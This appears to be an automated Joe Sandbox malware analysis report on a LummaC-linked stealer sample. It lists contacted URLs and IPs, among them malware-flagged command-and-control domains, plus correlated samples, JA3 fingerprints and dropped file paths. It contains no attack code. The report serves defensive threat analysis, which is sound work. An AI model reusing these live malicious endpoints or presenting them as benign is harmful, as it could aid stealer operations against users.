https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://debonairnukk.xyz/apieg	5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://recaptcha.net/recaptcha/;	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/apiyis	5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/_	wN8pQhRNnu.exe, 00000000.00000003.1758496876.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/discussions/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900GSg	5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://awake-weaves.cyou/apio	5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://deafeninggeh.biz/L_	5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.22.222	immureprech.biz	United States	13335	CLOUDFLARENETUS	false
104.21.16.1	deafeninggeh.biz	United States	13335	CLOUDFLARENETUS	false
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575335
Start date and time:	2024-12-15 09:22:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wN8pQhRNnu.exe renamed because original name is a hash value
Original Sample Name:	1c8d14491c1d595f460ad1b654a10571.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@11/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 42 Number of non-executed functions: 331
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 4.175.87.197, 20.190.177.147, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:23:23	API Interceptor	8857915x Sleep call for process: wN8pQhRNnu.exe modified
03:23:29	API Interceptor	7x Sleep call for process: 5759.tmp.exe modified
03:24:02	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.22.222	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
172.67.179.207	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse
23.55.153.106	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
immureprech.biz	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.22.222
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.207.38
deafeninggeh.biz	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.112.1
steamcommunity.com	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.164.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.207.38
AKAMAI-ASN1EU	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.55.153.106
CLOUDFLARENETUS	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.164.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.207.38
CLOUDFLARENETUS	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.164.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.207.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	afXf6ZiYTT.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	ZideZBMwUQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	hKyD3sj3Y9.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	P0w3gV5bH3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106 104.21.22.222 104.21.16.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.55.153.106 104.21.22.222 104.21.16.1
37f463bf4616ecd445d4a1937da06e19	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.179.207
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	172.67.179.207
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	172.67.179.207
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.179.207
	build.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	Setup.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\5759.tmp.exe	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5759.tmp.exe_c4d0347ebf67134b9ee4749dcf952ec5ae37963a_94fabcbd_e94f106d-fe59-4526-aa6f-4006b8b2ba61\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
